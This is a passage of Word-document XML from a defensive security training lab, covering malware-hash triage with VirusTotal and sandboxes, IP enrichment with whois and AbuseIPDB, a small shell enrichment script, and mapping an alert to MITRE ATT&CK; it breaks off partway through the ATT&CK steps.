          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In your browser open:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://www.virustotal.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paste the SHA-256 from Step 4 into the search box. For a real sample you would see how many of the 70+ AV engines flag it, the first-seen date, related samples, and community comments. (Our fabricated hash will be unknown — which is itself useful: an "unknown" hash on a finance server is more suspicious than an old, well-flagged one.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Other free sandboxes for the same workflow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hybrid Analysis — https://www.hybrid-analysis.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Any.Run — https://any.run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Joe Sandbox — https://www.joesandbox.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Decide: clean, suspicious, or malicious</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A simple triage matrix:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Static signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Verdict</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>file says script + C2 URL + base64 + YARA hit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Malicious — escalate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Strings benign, hash on VT clean, file type matches extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Clean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Anything in between</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Suspicious — submit to sandbox (Lab references Joe / Cuckoo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identify file type with file (not extension).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Generate MD5/SHA-1/SHA-256 hashes for evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pull useful IOCs out of a binary with strings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Write and run a YARA rule against a sample and a directory sweep.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use VirusTotal and free sandboxes to enrich a hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cryptography Toolkit (https://alfredang.github.io/cryptography-toolkit/) — a browser toolkit for hashing, encoding and encryption/decryption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the Cryptography Toolkit to generate and compare file hashes (MD5/SHA-256) in the browser and confirm they match the values you compute on the command line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to identify file type with file (not extension).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 10 — Threat Intelligence and MITRE ATT&amp;CK</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enrich a suspicious IP with whois, AbuseIPDB, and Shodan, then map an observed behaviour to a MITRE ATT&amp;CK technique using the free Navigator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will enrich a suspicious IP with whois, AbuseIPDB, and Shodan, then map an observed behaviour to a MITRE ATT&amp;CK technique using the free Navigator. You will also script a tiny SOAR-style automation. This covers CySA+ 1.4 (Threat actors, TTP, Collection methods, Threat-intelligence sharing, Active defense) and 1.5 (SOAR, automation, API).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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 Web (AbuseIPDB, ATT&amp;CK Navigator)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="2778113"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_7e5b2de820.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2778113"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y whois curl jq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — WHOIS lookup (Collection methods — Open source)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>whois 8.8.8.8 | grep -Ei 'orgname|country|netrange|cidr'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>whois example.com | grep -Ei 'registrar|country|creation|expir'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Things to look for in incident triage:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Recently registered domain (Creation Date &lt; 7 days) is highly suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bullet-proof / privacy-protected registrar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Country mismatch versus the user base.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — AbuseIPDB API enrichment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AbuseIPDB gives an abuse-confidence score 0–100 for any IP. Sign up free at https://www.abuseipdb.com/account/api — paste your key when prompted, or skip with a dry-run:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>read -p "AbuseIPDB API key (or press Enter to skip): " ABUSE_KEY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if [ -n "$ABUSE_KEY" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  curl -s -G https://api.abuseipdb.com/api/v2/check \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    --data-urlencode "ipAddress=185.220.101.45" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H "Key: $ABUSE_KEY" -H "Accept: application/json" | jq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>abuseConfidenceScore ≥ 75 is the classic "block now" threshold. usageType=hosting + high score is a typical scanner/C2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Build a small enrichment script (SOAR primitive)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; /tmp/enrich.sh &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IP="$1"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "=== Enrichment for $IP ==="</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "[whois country]"; whois "$IP" 2&gt;/dev/null | grep -i country | head -1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "[reverse DNS]";   dig +short -x "$IP" || echo "(none)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "[port:80 HTTP banner]"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -m 5 -s -o /dev/null -w "%{http_code} %{remote_ip}\n" "http://$IP" 2&gt;/dev/null</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chmod +x /tmp/enrich.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/tmp/enrich.sh 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is a SOAR playbook in miniature: one IOC in, multiple sources queried, structured output ready to feed a ticket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Map a behaviour to MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open the MITRE ATT&amp;CK Navigator in your browser: https://mitre-attack.github.io/attack-navigator/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Suppose your SIEM detected: *"PowerShell downloaded a remote script and ran it in memory."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In the search box type Ingress Tool Transfer → technique T1105.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Type PowerShell → technique T1059.001 (Command and Scripting Interpreter: PowerShell).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
